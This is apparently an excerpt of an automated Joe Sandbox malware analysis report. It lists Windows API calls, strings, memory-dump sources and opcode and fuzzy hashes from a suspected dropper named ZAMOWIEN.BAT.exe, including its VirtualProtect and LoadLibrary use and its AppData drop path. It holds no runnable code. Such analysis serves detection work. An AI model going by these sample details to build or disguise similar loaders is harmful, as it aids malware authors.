                                                                                  • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                  • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                  • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                  • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(7050405C,00000004,00000040,7050404C), ref: 705029B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 387148cdd989a9dd62082a432c731983b58e2eab143394c0c2ceb614169e6f89
                                                                                  • Instruction ID: 50f94276c40c5b04c3e79f4be5b9b22e93e96fd32885d6fd52ed31cfc1a1c074
                                                                                  • Opcode Fuzzy Hash: 387148cdd989a9dd62082a432c731983b58e2eab143394c0c2ceb614169e6f89
                                                                                  • Instruction Fuzzy Hash: C3F07FF25052C0DED350DF7A8C6870E3BE0E768204B21A52AA7A9EE260E3B444448F11
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                  • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                  • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                  • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                                  • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                                  • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                  • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                                  • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                                  • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                  • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                                  • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                                  • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004051E9
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $M$N
                                                                                  • API String ID: 1638840714-813528018
                                                                                  • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                  • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                                                                  • API String ID: 2624150263-2747099026
                                                                                  • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                  • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                  APIs
                                                                                    • Part of subcall function 7050121B: GlobalAlloc.KERNEL32(00000040,?,7050123B,?,705012DF,00000019,705011BE,-000000A0), ref: 70501225
                                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70501C6F
                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 70501CB7
                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 70501CC1
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501CD4
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DB6
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DBB
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501DC0
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501FAA
                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 70502144
                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 705021B9
                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 705021CA
                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 70502224
                                                                                  • lstrlenW.KERNEL32(00000808), ref: 7050223E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 245916457-0
                                                                                  • Opcode ID: 687b68fa4681c8dcf21e9f7f9f41e8b500300d6f5797c58174b4c1df23a333b1
                                                                                  • Instruction ID: ffede7ec748ab8927ff91f1efdec1049ddda92feaf2e663774c2631d2ad37bea
                                                                                  • Opcode Fuzzy Hash: 687b68fa4681c8dcf21e9f7f9f41e8b500300d6f5797c58174b4c1df23a333b1
                                                                                  • Instruction Fuzzy Hash: C5229C76D0020ADEDB119FB4C9846EEBFB9FB04305F20492ED197E7280E7749A81DB56
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 004021C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness
                                                                                  • API String ID: 542301482-3308940007
                                                                                  • Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                                  • Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
                                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
